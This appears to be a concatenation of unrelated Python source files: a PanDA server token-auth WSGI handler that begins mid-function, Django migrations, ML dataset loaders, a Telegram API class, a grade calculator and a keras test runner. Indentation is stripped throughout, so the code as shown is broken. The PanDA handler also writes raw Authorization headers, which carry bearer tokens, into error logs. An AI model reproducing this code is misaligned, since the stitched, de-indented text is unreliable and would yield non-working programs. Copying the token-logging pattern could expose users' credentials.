if panda_config.token_authType in ['scitokens', 'oidc'] and 'HTTP_AUTHORIZATION' in env:
serialized_token = env['HTTP_AUTHORIZATION'].split()[1]
if panda_config.token_authType == 'scitokens':
token = scitokens.SciToken.deserialize(serialized_token, audience=panda_config.token_audience)
else:
if 'HTTP_ORIGIN' in env:
vo = env['HTTP_ORIGIN']
else:
vo = None
token = oidc_utils.deserialize_token(serialized_token, panda_config.auth_config,
vo)
# check with auth policies
if panda_config.token_authType == 'oidc':
self.authenticated = False
vo = token[ "vo"]
if vo not in panda_config.auth_policies:
self.message = 'unknown vo : {}'.format(vo)
tmpLog.error('{} - {}'.format(self.message, env['HTTP_AUTHORIZATION']))
else:
for memberStr, memberInfo in panda_config.auth_policies[vo]:
if memberStr in token["groups"]:
self.subprocess_env['PANDA_OIDC_VO'] = vo
self.subprocess_env['PANDA_OIDC_GROUP'] = memberInfo['group']
self.subprocess_env['PANDA_OIDC_ROLE'] = memberInfo['role']
self.authenticated = True
break
if not self.authenticated:
self.message = 'invalid member in {}'.format(vo)
tmpLog.error('{} - {}'.format(self.message, env['HTTP_AUTHORIZATION']))
# check issuer
if 'iss' not in token:
self.message = 'issuer is undefined in the token'
tmpLog.error(self.message)
else:
if panda_config.token_authType == 'scitokens':
items = token.claims()
else:
items = six.iteritems(token)
for c, v in items:
self.subprocess_env['PANDA_OIDC_CLAIM_{0}'.format(str(c))] = str(v)
# use sub and scope as DN and FQAN
if 'SSL_CLIENT_S_DN' not in self.subprocess_env:
if 'name' in token:
self.subprocess_env['SSL_CLIENT_S_DN'] = str(token['name'])
else:
self.subprocess_env['SSL_CLIENT_S_DN'] = str(token['sub'])
i = 0
for scope in token.get('scope', '').split():
if scope.startswith('role:'):
self.subprocess_env['GRST_CRED_AUTH_TOKEN_{0}'.format(i)] = 'VOMS ' + str(scope.split(':')[-1])
i += 1
except Exception as e:
self.message = 'invalid token: {}'.format(str(e))
tmpLog.error('{} - {}'.format(self.message, env['HTTP_AUTHORIZATION']))
# get remote host
def get_remote_host(self):
if 'REMOTE_HOST' in self.subprocess_env:
return self.subprocess_env['REMOTE_HOST']
return ""
# accept json
def acceptJson(self):
try:
if 'HTTP_ACCEPT' in self.subprocess_env:
return 'application/json' in self.subprocess_env['HTTP_ACCEPT']
except Exception:
pass
return False
# application
def application(environ, start_response):
# get method name
methodName = ''
if 'SCRIPT_NAME' in environ:
methodName = environ['SCRIPT_NAME'].split('/')[-1]
tmpLog = LogWrapper(_logger, "PID={0} {1}".format(os.getpid(), methodName), seeMem=True)
cont_length = int(environ.get('CONTENT_LENGTH', 0))
json_body = environ.get('CONTENT_TYPE', None) == 'application/json'
tmpLog.debug("start content-length={} json={}".format(cont_length, json_body))
regStart = datetime.datetime.utcnow()
retType = None
# check method name
if methodName not in allowedMethods:
tmpLog.error("is forbidden")
exeRes = "False : %s is forbidden" % methodName
else:
# get method object
tmpMethod = None
try:
tmpMethod = globals()[methodName]
except Exception:
pass
# object not found
if tmpMethod is None:
tmpLog.error("is undefined")
exeRes = "False"
else:
body = b''
try:
while cont_length > 0:
chunk = environ['wsgi.input'].read(min(cont_length, 1024*1024))
if not chunk:
break
cont_length -= len(chunk)
body += chunk
if cont_length > 0:
raise OSError('partial read from client. {} bytes remaining'.format(cont_length))
if not json_body:
# query string
environ['wsgi.input'] = io.BytesIO(body)
# get params
tmpPars = cgi.FieldStorage(environ['wsgi.input'], environ=environ,
keep_blank_values=1)
# convert to map
params = {}
for tmpKey in list(tmpPars):
if tmpPars[tmpKey].file is not None and tmpPars[tmpKey].filename is not None:
# file
params[tmpKey] = tmpPars[tmpKey]
else:
# string
params[tmpKey] = tmpPars.getfirst(tmpKey)
else:
# json
body = gzip.decompress(body)
params = json.loads(body)
if panda_config.entryVerbose:
tmpLog.debug("with %s" % str(list(params)))
# dummy request object
dummyReq = DummyReq(environ, tmpLog)
if not dummyReq.authenticated:
start_response('403 Forbidden', [('Content-Type', 'text/plain')])
return ["ERROR : token-based authentication failed on the server side with {}".format(
dummyReq.message).encode()]
param_list = [dummyReq]
# exec
exeRes = tmpMethod(*param_list, **params)
# extract return type
if isinstance(exeRes, dict):
retType = exeRes['type']
exeRes = exeRes['content']
# convert bool to string
if exeRes in [True,False]:
exeRes = str(exeRes)
except Exception as e:
tmpLog.error("execution failure : {0}\n {1}".format(str(e), traceback.format_exc()))
if hasattr(panda_config, 'dumpBadRequest') and panda_config.dumpBadRequest:
try:
with tempfile.NamedTemporaryFile(delete=False, prefix='req_dump_') as f:
environ['WSGI_INPUT_DUMP'] = f.name
f.write(body)
os.chmod(f.name, 0o775)
except Exception:
tmpLog.error(traceback.format_exc())
pass
errStr = ""
for tmpKey in environ:
tmpVal = environ[tmpKey]
errStr += "%s : %s\n" % (tmpKey,str(tmpVal))
tmpLog.error(errStr)
# return internal server error
start_response('500 INTERNAL SERVER ERROR', [('Content-Type', 'text/plain')])
# force kill to release memory
if type(e) == OSError:
tmpLog.warning('force restart due')
os.kill(os.getpid(), signal.SIGINT)
return [str(e).encode()]
if panda_config.entryVerbose:
tmpLog.debug("done")
regTime = datetime.datetime.utcnow() - regStart
tmpLog.info("exec_time=%s.%03d sec, return len=%s B" % (regTime.seconds,
regTime.microseconds/1000,
len(str(exeRes))))
# return
if exeRes == pandaserver.taskbuffer.ErrorCode.EC_NotFound:
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['not found'.encode()]
elif isinstance(exeRes, pandaserver.taskbuffer.ErrorCode.EC_Redirect):
start_response('302 Redirect', [('Location', exeRes.url)])
return ['redirect'.encode()]
else:
if retType == 'json':
start_response('200 OK', [('Content-Type', 'application/json')])
else:
start_response('200 OK', [('Content-Type', 'text/plain')])
if isinstance(exeRes, str):
exeRes = exeRes.encode()
return [exeRes]
# start server
if panda_config.useFastCGI:
from flup.server.fcgi import WSGIServer
WSGIServer(application,multithreaded=False).run()
|
python
|
# -*- coding: UTF-8 -*-
#!usr/env/bin python 3.6
from matplotlib.font_manager import FontProperties
import matplotlib.lines as mlines
import matplotlib.pyplot as plt
import numpy as np
def file2matrix(file_name):
file = open(file_name)
array_lines = file.readlines()
number_of_lines = len(array_lines)
return_matrix = np.zeros((number_of_lines,3))
class_label_vector = []
index = 0
for line in array_lines:
line = line.strip()
list_line = line.split('\t')
return_matrix[index,:] = list_line[0:3]
if list_line[-1] == 'didntLike':
class_label_vector.append(1)
if list_line[-1] == 'smallDoses':
class_label_vector.append(2)
if list_line[-1] == 'largeDoses':
class_label_vector.append(3)
index += 1
return return_matrix,class_label_vector
def show_data(dating_data_mat,dating_labels):
font = FontProperties(fname=r"c:\windows\fonts\simsun.ttc",size=14)
fig,axs = plt.subplots(nrows=2,ncols=2,sharex=False,sharey=False)#,figsize=(13,8))
number_of_labels = len(dating_labels)
labels_colors=[]
for i in dating_labels:
if i == 1:
labels_colors.append('black')
if i == 2:
labels_colors.append('orange')
if i == 3:
labels_colors.append('red')
axs[0][0].scatter(x=dating_data_mat[:,0],y=dating_data_mat[:,1],color=labels_colors,s=15,alpha=.5)
axs0_title_text = axs[0][0].set_title(u'每年获得的飞行常客里程数域玩视频游戏所消耗时间比',FontProperties=font)
axs0_xlabel_text = axs[0][0].set_xlabel(u'',FontProperties=font)
axs0_ylabel_text = axs[0][0].set_ylabel(u'',FontProperties=font)
plt.setp(axs0_title_text,size=9,weight='bold',color='red')
plt.setp(axs0_xlabel_text,size=7,weight='bold',color='black')
plt.setp(axs0_ylabel_text,size=7,weight='bold',color='black')
plt.show()
if __name__ == '__main__':
file_name = 'datingTestSet.txt'
dating_data_mat,dating_labels = file2matrix(file_name)
show_data(dating_data_mat,dating_labels)
|
python
|
# Copyright (c) 2022 Manuel Olguín Muñoz <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import time
from collections import deque
from os import PathLike
from typing import Any, Dict, Iterator, Sequence, Tuple
import numpy as np
import numpy.typing as npt
import pandas as pd
import yaml
class FrameSet:
"""
Abstraction of a set of video frames for the model.
Easiest way to build an instance of this class is using the
FrameSet.from_datafile class method. This method takes a tracefile in
.npz format and parses it.
"""
def __init__(
self,
name: str,
initial_frame: npt.NDArray,
steps: Sequence[Dict[str, npt.NDArray]],
):
"""
Parameters
----------
name
A name for the task represented by this trace of frames.
initial_frame
The initial video frame required by the backend to initialize
the task.
steps
A sequence containing dictionaries mapping frame tags to video
frames, in order of steps.
Note that it is expected that all steps have the same tags!
"""
self._name = name
self._init_frame = initial_frame
self._steps = tuple(steps)
self._num_steps = len(self._steps)
def __str__(self) -> str:
return yaml.safe_dump(
{
"name": self._name,
"num_steps": self.step_count,
"initial_frame": f"{len(self._init_frame.tobytes())} bytes",
"steps": [
{tag: f"{len(data.tobytes())} bytes" for tag, data in step.items()}
for step in self._steps
],
}
)
@property
def step_count(self) -> int:
return self._num_steps
@property
def name(self) -> str:
return self._name
def get_initial_frame(self) -> npt.NDArray:
"""
Returns
-------
npt.NDArray
The initial video frame for this task.
"""
return self._init_frame.copy()
def get_frame(self, step_index: Any, frame_tag: str) -> npt.NDArray:
"""
Looks up a frame for a specific tag in a step.
Parameters
----------
step_index
Step index.
frame_tag
Frame tag to look up.
Returns
-------
npt.NDArray
A video frame.
"""
return self._steps[step_index][frame_tag].copy()
@classmethod
def from_datafile(cls, task_name: str, trace_path: PathLike | str) -> FrameSet:
"""
Opens a frame tracefile and parses it.
Traces correspond to compressed numpy array files (.npz) containing
the following arrays:
- An array called "initial" corresponding to the initial frame for
the task.
- A number `M x N` of arrays, where M is the number of different
possible tags for frames during a step, and N corresponds to
the number of steps in the tag. Each of these arrays is named
following the convention "step_<step index (two digits,
0-padded)>_<frame tag>".
Parameters
----------
task_name
Task name for this trace.
trace_path
Path to the datafile.
Returns
-------
FrameSet
A FrameSet object.
"""
data = np.load(trace_path)
# trace NPZ file contains initial frame + 3 frames per step
# success, blank, and low_confidence
# TODO: this assumes 3 frame categories per step (success, low confidence and
# blank (repeat is simply the previous success)). Maybe we should add a way
# of configuring that.
assert (len(data) - 1) % 3 == 0
num_steps = (len(data) - 1) // 3
init_frame = data["initial"]
# TODO: hardcoded categories
steps = deque()
repeat = init_frame
for step in range(num_steps):
step_dict = {}
for tag in ("success", "blank", "low_confidence"):
step_dict[tag] = data[f"step{step:02d}_{tag}"]
step_dict["repeat"] = repeat
repeat = step_dict["success"]
steps.append(step_dict)
return FrameSet(name=task_name, initial_frame=init_frame, steps=steps)
class FrameModel:
def __init__(self, probabilities: pd.DataFrame, success_tag: str = "success"):
"""
Parameters
----------
probabilities
A Pandas DataFrame containing two columns 'bin_start' and
'bin_end', and an arbitrary number of additional columns.
'bin_start' and 'bin_end' correspond to the left and right limits
respectively of left-inclusive, right-exclusive bins of relative
time position (e.g. if total duration is 10 seconds, 3 seconds
would fall in bin [0.0, 0.5) and 7 seconds in bin [0.5, 1.0)).
All other columns are interpreted as relative probabilities for a
tag (identified by the column name) within a bin.
All probabilities for tags in a bin MUST add up to 1.0.
For example, a row<br><br>
<table>
<thead>
<tr>
<th>bin_start</th>
<th>bin_end</th>
<th>repeat</th>
<th>low_confidence</th>
<th>blank</th>
</tr>
</thead>
<tbody>
<tr>
<td>0.0</td>
<td>0.2</td>
<td>0.3</td>
<td>0.1</td>
<td>0.6</td>
</tr>
</tbody>
</table><br>
indicates that within bin [0, 0.2), 'repeat' frames occur with a
relative probability of 0.3, 'low_confidence' frames with a
relative probability of 0.1, and 'blank' frames with a relative
probability of 0.6.
success_tag
String to be returned by methods of this class whenever the target
step time has been achieved.
"""
# validation
columns = set(probabilities.columns)
try:
columns.remove("bin_start")
columns.remove("bin_end")
except KeyError:
raise RuntimeError(
"Probability dataframe must include bin_start " "and bin_end columns."
)
prob_sums = np.zeros(len(probabilities.index))
for column in columns:
prob_sums += probabilities[column]
if not np.all(np.isclose(prob_sums, 1.0)):
raise RuntimeError(
"Sum of probabilities for each bin must be " "equal to 1.0."
)
# process probabilities
self._probs = probabilities.copy()
self._probs["interval"] = pd.IntervalIndex.from_arrays(
left=probabilities["bin_start"],
right=probabilities["bin_end"],
closed="left",
)
self._probs = self._probs.drop(columns=["bin_start", "bin_end"]).set_index(
"interval", verify_integrity=True
)
self._rng = np.random.default_rng()
self._success_tag = success_tag
def _sample_from_distribution(self, rel_pos: float) -> str:
if rel_pos > 1:
return self._success_tag
probs = self._probs[self._probs.index.contains(rel_pos)].iloc[0]
return self._rng.choice(a=probs.index, replace=False, p=probs.values)
def get_frame_at_instant(self, instant: float | int, step_time: float | int) -> str:
"""
Return a frame sampled from a specific instant in a step.
Parameters
----------
instant
Number of seconds since the start of the step.
step_time
Total target step duration.
Returns
-------
str
A randomly sampled step tag.
"""
# purely according to distributions
try:
return self._sample_from_distribution(float(instant) / float(step_time))
except ZeroDivisionError:
# if step time is 0 we can immediately assume step is over!
return self._success_tag
def step_iterator(
self, target_time: float, infinite: bool = False
) -> Iterator[Tuple[str, float]]:
"""
An iterator over the frame tags in a step.
Any calls to next() between instants 0 and target_time will
correspond to frame tags sampled from the internal distributions.
Calls to next() after a time greater than target time has been
elapsed will always return a success tag; if infinite is False, the iterator
will additionally be closed.
Yields
------
str
Frame tags.
"""
step_start = time.monotonic()
while True:
instant = time.monotonic() - step_start
yield self.get_frame_at_instant(instant, target_time), instant
if instant > target_time and not infinite:
return
|
python
|
# Copyright (c) 2020 Graphcore Ltd. All rights reserved.
import torch
import poptorch
# half_stats_begin
model = torch.nn.Sequential()
model.add_module('lin', torch.nn.Linear(16, 16))
model.add_module('bn', torch.nn.BatchNorm1d(16))
model.float()
opts = poptorch.Options()
opts.Precision.runningStatisticsAlwaysFloat(False)
poptorch_model = poptorch.inferenceModel(model, opts)
# half_stats_end
|
python
|
# Generated by Django 2.2.24 on 2022-02-24 22:20
from django.db import migrations
def commit_old_currencies_deactivation(apps, schema_editor):
Currency = apps.get_model("exchange", "Currency")
db_alias = schema_editor.connection.alias
Currency.objects.using(db_alias).filter(code__in=["MRO", "VEF"]).update(active=False)
def rollback_old_currencies_deactivation(apps, schema_editor):
Currency = apps.get_model("exchange", "Currency")
db_alias = schema_editor.connection.alias
Currency.objects.using(db_alias).filter(code__in=["MRO", "VEF"]).update(active=True)
class Migration(migrations.Migration):
dependencies = [
('exchange', '0004_currency_active'),
]
operations = [
migrations.RunPython(commit_old_currencies_deactivation, rollback_old_currencies_deactivation),
]
|
python
|
#! /usr/bin/python
#
# xindice_python_delete.py
#
# Apr/13/2012
#
import math
import cgi
import string
import sys
import os
import xml.dom.minidom
import pycurl
#
import json
# ------------------------------------------------------------------
sys.path.append ('/var/www/data_base/common/python_common')
#
from text_manipulate import dict_delete_proc
from xml_manipulate import xml_to_dict_proc
from xml_manipulate import dict_to_xml_proc
#
from curl_get import curl_get_proc
from curl_get import curl_put_proc
#
from cgi_manipulate import parse_parameter
# ------------------------------------------------------------------
url_base = 'http://host_dbase:8888/xindice/db/'
url_sub = 'cities/cities'
url_in = url_base + url_sub
#
str_aa = curl_get_proc (url_in)
dict_aa=xml_to_dict_proc (str_aa)
#
# ------------------------------------------------------------------
#
#
print "Content-type: text/html\n\n"
#
# ---------------------------------------------------------------
#
print "*** check pppp_qqqq ***<br />"
array_bb = parse_parameter ()
print "*** check ssss_qqqq ***<br />"
#
print "len(array_bb) = %d<br />" % len(array_bb)
for it in range (len(array_bb)):
id_in = array_bb[it]
print "id_in = %s<br />" % id_in
dict_aa=dict_delete_proc (dict_aa,id_in)
print "*** check rrrr ***<br />"
#
print "*** check ssss ***<br />"
out_str = dict_to_xml_proc (dict_aa)
print "*** check tttt ***<br />"
#
#
curl_put_proc (url_in,out_str.encode('utf-8'))
#
#
print "OK<br />"
#
# ---------------------------------------------------------------
|
python
|
"""Wrapper for the CIFAR-10 dataset, which is provided in the `torchvision`
package.
The model and data transform are taken directly from:
https://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html
"""
# Chuan-Zheng Lee <[email protected]>
# July 2021
from pathlib import Path
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
from config import DATA_DIRECTORY
cifar10_transforms = {
# copied from https://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html
'norm1': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5)),
]),
# copied from https://github.com/akamaster/pytorch_resnet_cifar10/blob/master/trainer.py
'flip-crop-norm2': torchvision.transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(32, padding=4),
transforms.ToTensor(),
transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),
]),
'norm2': torchvision.transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),
]),
}
def get_cifar10_dataset(train=True, transform='norm1'):
# We want it to download automatically, torchvision prints a message if it's
# already downloaded, which is kind of annoying, so check if it's there
# first and pass download=False if it is.
cifar10_directory = Path(DATA_DIRECTORY) / "cifar10"
download = not (cifar10_directory / "cifar-10-batches-py").exists()
return torchvision.datasets.CIFAR10(
root=cifar10_directory,
train=train,
download=download,
transform=cifar10_transforms[transform],
)
# copied from https://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html
class Cifar10CNNSimple(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = self.pool(nn.functional.relu(self.conv1(x)))
x = self.pool(nn.functional.relu(self.conv2(x)))
x = torch.flatten(x, 1) # flatten all dimensions except batch
x = nn.functional.relu(self.fc1(x))
x = nn.functional.relu(self.fc2(x))
x = self.fc3(x)
return x
|
python
|
#Un alumno desea saber cual será su calificación final en la materia de Algoritmos.
#Dicha calificación se compone de los siguientes porcentajes:
#55% del promedio de sus tres calificaciones parciales.
#30% de la calificación del examen final.
#15% de la calificación de un trabajo final.
parcial1 = float(input("Diga la nota del parcial 1: "))
parcial2 = float(input("Diga la nota del parcual 2: "))
parcial3 = float(input("Diga la nota del parcial 3: "))
examenfinal = float(input("Diga la nota del examen final: "))
trabajofinal = float(input("Diga la nota del trabajo final: "))
promedio = (parcial1 + parcial2 + parcial3)/3
calificaciónfinal = (promedio * 55)/100 + (examenfinal * 30)/100 + (trabajofinal * 15)/100
print("La calificación final de la materia de algoritmos es de %.2f"%(calificaciónfinal))
|
python
|
from ..utils import Object
class EditMessageMedia(Object):
"""
Edits the content of a message with an animation, an audio, a document, a photo or a video. The media in the message can't be replaced if the message was set to self-destruct. Media can't be replaced by self-destructing media. Media in an album can be edited only to contain a photo or a video. Returns the edited message after the edit is completed on the server side
Attributes:
ID (:obj:`str`): ``EditMessageMedia``
Args:
chat_id (:obj:`int`):
The chat the message belongs to
message_id (:obj:`int`):
Identifier of the message
reply_markup (:class:`telegram.api.types.ReplyMarkup`):
The new message reply markup; for bots only
input_message_content (:class:`telegram.api.types.InputMessageContent`):
New content of the messageMust be one of the following types: InputMessageAnimation, InputMessageAudio, InputMessageDocument, InputMessagePhoto or InputMessageVideo
Returns:
Message
Raises:
:class:`telegram.Error`
"""
ID = "editMessageMedia"
def __init__(self, chat_id, message_id, reply_markup, input_message_content, extra=None, **kwargs):
self.extra = extra
self.chat_id = chat_id # int
self.message_id = message_id # int
self.reply_markup = reply_markup # ReplyMarkup
self.input_message_content = input_message_content # InputMessageContent
@staticmethod
def read(q: dict, *args) -> "EditMessageMedia":
chat_id = q.get('chat_id')
message_id = q.get('message_id')
reply_markup = Object.read(q.get('reply_markup'))
input_message_content = Object.read(q.get('input_message_content'))
return EditMessageMedia(chat_id, message_id, reply_markup, input_message_content)
|
python
|
# Generated by Django 3.0.7 on 2020-09-06 08:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('exams', '0020_auto_20200906_1408'),
]
operations = [
migrations.AlterField(
model_name='questionresponse',
name='student_exam',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='responses', to='exams.StudentExam'),
),
]
|
python
|
"""
Tox21 dataset loader.
"""
from __future__ import division
from __future__ import unicode_literals
import os
import logging
import deepchem
import dglt.contrib.moses.moses.data.featurizer as feat
from dglt.contrib.moses.moses.data.reader.utils import AdditionalInfo
from dglt.contrib.moses.moses.data.reader.data_loader import CSVLoader
logger = logging.getLogger(__name__)
def get_tox21_data_path():
data_dir = deepchem.utils.get_data_dir()
dataset_file = os.path.join(data_dir, "tox21.csv.gz")
if not os.path.exists(dataset_file):
deepchem.utils.download_url(
'http://deepchem.io.s3-website-us-west-1.amazonaws.com/datasets/tox21.csv.gz'
)
return dataset_file
dataset_file = get_tox21_data_path()
tox21_ad = AdditionalInfo(dataset_file, smiles_field='smiles')
def load_tox21(featurizer='ECFP', split='index', reload=True, K=1):
"""Load Tox21 datasets. Does not do train/test split"""
# Featurize Tox21 dataset
tox21_tasks = [
'NR-AR', 'NR-AR-LBD', 'NR-AhR', 'NR-Aromatase', 'NR-ER', 'NR-ER-LBD',
'NR-PPAR-gamma', 'SR-ARE', 'SR-ATAD5', 'SR-HSE', 'SR-MMP', 'SR-p53'
]
data_dir = deepchem.utils.get_data_dir()
# TODO: reload should be modified to support cross vailidation cases.
if reload and K == 1:
save_dir = os.path.join(data_dir, "tox21/" + featurizer + "/" + str(split))
loaded, all_dataset, transformers = deepchem.utils.save.load_dataset_from_disk(
save_dir)
if loaded:
return tox21_tasks, all_dataset, transformers
dataset_file = get_tox21_data_path()
if featurizer == 'ECFP':
featurizer = feat.CircularFingerprint(size=1024)
elif featurizer == 'GraphConv':
featurizer = feat.ConvMolFeaturizer()
elif featurizer == 'Weave':
featurizer = feat.WeaveFeaturizer()
elif featurizer == 'Raw':
featurizer = feat.RawFeaturizer()
elif featurizer == 'AdjacencyConv':
featurizer = feat.AdjacencyFingerprint(
max_n_atoms=150, max_valence=6)
elif featurizer == 'EAGCN':
featurizer = feat.EagcnFeaturizer(tox21_ad.bond_type_dict, tox21_ad.atom_type_dict)
loader = CSVLoader(
tasks=tox21_tasks, smiles_field="smiles", featurizer=featurizer)
dataset = loader.featurize(dataset_file, shard_size=8192)
# Initialize transformers
transformers = [
deepchem.trans.BalancingTransformer(transform_w=True, dataset=dataset)
]
logger.info("About to transform data")
for transformer in transformers:
dataset = transformer.transform(dataset)
if split == None:
return tox21_tasks, (dataset, None, None), transformers
splitters = {
'index': deepchem.splits.IndexSplitter(),
'random': deepchem.splits.RandomSplitter(),
'scaffold': deepchem.splits.ScaffoldSplitter(),
# 'butina': deepchem.splits.ButinaSplitter(),
# 'task': deepchem.splits.TaskSplitter()
}
splitter = splitters[split]
if K > 1:
fold_datasets = splitter.k_fold_split(dataset, K)
all_dataset = fold_datasets
else:
train, valid, test = splitter.train_valid_test_split(dataset)
all_dataset = (train, valid, test)
if reload:
deepchem.utils.save.save_dataset_to_disk(save_dir, train, valid, test,
transformers)
return tox21_tasks, all_dataset, transformers
|
python
|
import os
import sys
import time
from monk.pip_functionality_tests.keras.test_default_train import test_default_train
from monk.pip_functionality_tests.keras.test_default_eval_infer import test_default_eval_infer
from monk.pip_functionality_tests.keras.test_update_copy_from import test_update_copy_from
from monk.pip_functionality_tests.keras.test_update_normal import test_update_normal
from monk.pip_functionality_tests.keras.test_update_eval_infer import test_update_eval_infer
from monk.pip_functionality_tests.keras.test_expert_train import test_expert_train
from monk.pip_functionality_tests.keras.test_expert_eval_infer import test_expert_eval_infer
from monk.pip_functionality_tests.keras.test_switch_default import test_switch_default
from monk.pip_functionality_tests.keras.test_switch_expert import test_switch_expert
from monk.pip_functionality_tests.keras.test_compare import test_compare
from monk.pip_functionality_tests.keras.test_analyse import test_analyse
def run_functionality_tests():
origstdout = sys.stdout
print("Running Tests...");
sys.stdout = open("test_logs.txt", 'w');
system_dict = {};
system_dict["total_tests"] = 0;
system_dict["successful_tests"] = 0;
system_dict["failed_tests_lists"] = [];
system_dict["failed_tests_exceptions"] = [];
system_dict["skipped_tests_lists"] = [];
start = time.time()
print("Running 1/11");
system_dict = test_default_train(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 2/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_default_eval_infer(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 3/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_update_copy_from(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 4/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_update_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 5/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_update_eval_infer(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 6/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_expert_train(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("Running 7/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_expert_eval_infer(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 8/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_switch_default(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 9/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_switch_expert(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 10/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_compare(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 11/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_analyse(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
sys.stdout = open("test_logs.txt", 'a');
end = time.time();
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("");
for i in range(len(system_dict["failed_tests_lists"])):
print("{}. Failed Test:".format(i+1));
print("Name - {}".format(system_dict["failed_tests_lists"][i]));
print("Error - {}".format(system_dict["failed_tests_exceptions"][i]));
print("");
print("Skipped Tests List - {}".format(system_dict["skipped_tests_lists"]));
print("");
sys.stdout = origstdout;
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("See test_logs.txt for errors");
print("");
os.system("rm -r workspace");
def run_unit_tests():
from monk.pip_unit_tests.keras.test_optimizer_sgd import test_optimizer_sgd
from monk.pip_unit_tests.keras.test_optimizer_nesterov_sgd import test_optimizer_nesterov_sgd
from monk.pip_unit_tests.keras.test_optimizer_rmsprop import test_optimizer_rmsprop
from monk.pip_unit_tests.keras.test_optimizer_adam import test_optimizer_adam
from monk.pip_unit_tests.keras.test_optimizer_nadam import test_optimizer_nadam
from monk.pip_unit_tests.keras.test_optimizer_adamax import test_optimizer_adamax
from monk.pip_unit_tests.keras.test_optimizer_adadelta import test_optimizer_adadelta
from monk.pip_unit_tests.keras.test_optimizer_adagrad import test_optimizer_adagrad
from monk.pip_unit_tests.keras.test_loss_l1 import test_loss_l1
from monk.pip_unit_tests.keras.test_loss_l2 import test_loss_l2
from monk.pip_unit_tests.keras.test_loss_crossentropy import test_loss_crossentropy
from monk.pip_unit_tests.keras.test_loss_binary_crossentropy import test_loss_binary_crossentropy
from monk.pip_unit_tests.keras.test_loss_kldiv import test_loss_kldiv
from monk.pip_unit_tests.keras.test_loss_hinge import test_loss_hinge
from monk.pip_unit_tests.keras.test_loss_squared_hinge import test_loss_squared_hinge
origstdout = sys.stdout
print("Running Tests...");
sys.stdout = open("test_logs.txt", 'w');
system_dict = {};
system_dict["total_tests"] = 0;
system_dict["successful_tests"] = 0;
system_dict["failed_tests_lists"] = [];
system_dict["failed_tests_exceptions"] = [];
system_dict["skipped_tests_lists"] = [];
start = time.time()
exp_num = 1;
